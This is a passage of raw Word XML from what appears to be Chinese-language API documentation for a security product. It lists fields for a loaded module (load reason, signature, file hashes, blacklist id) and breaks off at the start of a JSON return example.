            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>module_type</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30FFE93D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64A38A1F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70F6B39B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>模块类型 0 普通模块 1 普通WOW64模块 2 内核模块 3 映像映射 4 文件映射</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="48F6214E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36BF675C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>load_time</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67ECF30F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="083580F6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07A1102C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>加载时间，时间戳，精确到秒（需要win8以上版本系统，且驱动模块无效）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="54BA6BF3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25688574" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>load_reason</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35D47DFF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33F264B9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="750ED2D0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>加载原因（需要win8以上版本系统，且驱动模块无效） 0 静态依赖 1 静态代理依赖 2 动态代理依赖 3 动态依赖 4 动态加载 5 作为映像加载 6 作为数据加载 其他值：未知原因</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7F5AAEB6" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0ECC22D2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>signature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48608816" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A519DDE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68221A5F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>签名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1A98B8D5" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54ED7427" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>f_size</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="348DD5B5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="404C5CEA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C9566E2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件大小</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="479B4846" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FF776DA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>f_user</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0397813C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66458DF9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1564659F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件所有者</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="61537F45" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B307228" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>f_type</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C98425E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7837082E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7241CC9C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>32/64/空 表示 32位文件，64位文件，空未知</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1B0444C2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B466AFB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>f_ctime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3783151F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3ACE1C5B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10229D96" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件create time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="56B10F75" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DCE81F9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>f_mtime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="465CE979" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7575B3C0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F7DC310" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件modify time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="52197A97" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61AAE2C1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>f_atime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73C9EB7D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="245C1166" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B143A9C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件access time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="31EE687B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3680DFE1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0919793B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="314C92A5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61A27EFC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>全文md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="137E715F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="222B15D8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69F1CD2B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C58D252" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76897C9C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>全文sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7CC379DC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74D0175C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E1D1A0F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D7D922E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="055DDBBC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>全文sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4434A2E9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7226E075" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>code_section_md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="587DEC4D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71DF334A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1ABF9E9D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>代码段MD5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="10C71F4B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="325A8F20" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>code_section_sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5731873B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="221DBCA6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69DAFA74" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>代码段sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="23C899EA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="420829FB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>code_section_sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E3F62B1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70B9F857" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29790BDB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>代码段sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5AB71E04" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61C5792D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>black_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FC6A503" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32B552FC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="713D60CA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>黑名单id (默认0)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3E076A60" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D88C66F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>module_info</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>module_path</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "signature": "Microsoft Corporation",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
